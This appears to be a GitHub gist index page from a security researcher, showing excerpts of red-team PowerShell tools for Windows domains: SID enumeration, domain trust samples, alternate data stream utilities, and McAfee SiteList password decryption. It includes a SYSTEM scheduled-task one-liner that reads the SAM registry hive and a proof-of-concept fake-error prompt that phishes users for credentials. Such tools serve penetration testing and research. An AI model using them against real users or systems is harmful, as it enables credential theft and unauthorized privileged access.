Will HarmJ0y

HarmJ0y / findsid.bat
Last active Aug 29, 2015
Win7 Powershell SID Enumeration
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
HarmJ0y / gist:57f1dac93fcc3564f9b3
Created Oct 23, 2014
domain user to sid and sid to user
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value
HarmJ0y / trusts.csv
Created Dec 29, 2014
Simple Domain Trust Output
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com engineering.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
corp.mothership.com subsidiary.com External Inbound
finance.mothership.com mothership.com ParentChild Bidirectional
engineering.mothership.com mothership.com ParentChild Bidirectional
subsidiary.com product.subsidiary.com ParentChild Bidirectional
HarmJ0y / trusts_complex.csv
Created Dec 29, 2014
More Complex Domain Trust Example
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com contracts.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com product.othercompany.com External Inbound
product.othercompany.com contracts.mothership.com External Outbound
product.othercompany.com othercompany.com ParentChild Bidirectional
HarmJ0y / streams.ps1
Last active Aug 29, 2015
streams.ps1
# these functions allow you to enumerate, add, and remove alternate data streams
# it can function as a bootleg replacement for Sysinternals' streams.exe
function Find-Streams {
<#
.SYNOPSIS
Enumerates all alternate data streams for a specified path.
If no path is provided, the current path is used.
Author: @harmj0y
License: BSD 3-Clause
View gist:0f847818b14f745b474d
### Keybase proof
I hereby claim:
* I am harmj0y on github.
* I am harmj0y (https://keybase.io/harmj0y) on keybase.
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3
To claim this, I am signing this object:
View Invoke-LockWorkStation.ps1
Function Invoke-LockWorkStation {
# region define P/Invoke types dynamically
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
# thanks matt and chris :)
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
View Translate-Canonical.ps1
function Translate-Canonical {
<#
.SYNOPSIS
Converts a user@fqdn to NT4 format.
.LINK
http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
#>
[CmdletBinding()]
param(
[String]$User
View prompt.ps1
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
function prompt {
Add-Type -AssemblyName Microsoft.VisualBasic
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
HarmJ0y / Get-DecryptedSitelistPassword.ps1
Created Feb 12, 2016
Get-DecryptedSitelistPassword.ps1
function Get-DecryptedSitelistPassword {
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
# port by @harmj0y
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[String]
$B64Pass
)